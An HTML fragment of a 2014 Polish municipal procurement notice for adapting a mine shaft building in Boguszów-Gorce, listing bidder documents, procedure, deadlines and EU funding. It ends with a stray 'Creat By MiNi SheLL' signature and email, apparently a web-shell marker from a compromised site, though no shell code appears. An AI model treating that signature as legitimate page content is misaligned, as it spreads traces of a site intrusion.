<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3)	Oświadczenie, że Wykonawca nie zalega z opłacaniem podatków lub oświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
Uwaga!: Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokument, o którym mowa, musi złożyć każdy z Wykonawców - oddzielnie.

4)	Oświadczenie, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
Uwaga!:  Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokument, o którym mowa, musi złożyć każdy z Wykonawców - oddzielnie.
5.	Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do tych zasobów żąda od Wykonawcy: 
1)	przedstawienia pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia ( zał.nr 5), obejmującego w szczególności:
a)	zakres dostępnych wykonawcy zasobów innego podmiotu,
b)	sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c)	charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d)	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia;
6.	 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w art. 26 ust. 2b ustawy Pzp, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez Wykonawcę lub te podmioty.
Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1-4pzp,
9.	Zasady składania oferty wspólnej przez formę organizacyjną typu konsorcjum.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. spółka cywilna, konsorcjum). W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy. W takim przypadku Wykonawca do oferty musi dołączyć następujące dokumenty:
1)	Oświadczenie członków konsorcjum o ich odpowiedzialności solidarnej za zobowiązania,
2)	Pismo o powołaniu pełnomocnika konsorcjum, czyli członka konsorcjum wyznaczonego do kontaktów z Zamawiającym i mającego pełnomocnictwo ogólne do składania oświadczeń w imieniu członków konsorcjum oraz do złożenia oferty i podpisania umowy w imieniu konsorcjum w sprawie zamówienia publicznego,
3)	W razie pełnienia czynności przekraczający zwykły zarząd, pełnomocnik konsorcjum zobowiązany jest do przedstawienia Zamawiającemu pełnomocnictwa szczegółowego, w którym to uwidoczni, że jest uprawniony do podejmowania takiej czynności.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.boguszow-gorce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Boguszowie-Gorcach, Pl. Odrodzenia 1, 58-370 Boguszów-Gorce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2014 godzina 10:00, miejsce: Urząd Miejski w Boguszowie-Gorcach, Pl. Odrodzenia 1,
58-370 Boguszów-Gorce, pok. Nr 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie publiczne dofinansowane jest w ramach Projektu nr RPDS.09.01.00-02-222/09 pn.: Adaptacja budynku nadszybia z wieżą wyciągową na Centrum Kulturalno- Kongresowe Witold przy ul. Traugutta w Boguszowie-Gorcach, w ramach Działania nr 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców, Priorytet nr 9. Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta) RPO WD na podstawie umowy o dofinansowanie nr UDA-RPDS.09.01.00-02-222-09-00 z dnia 19.08.2010r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com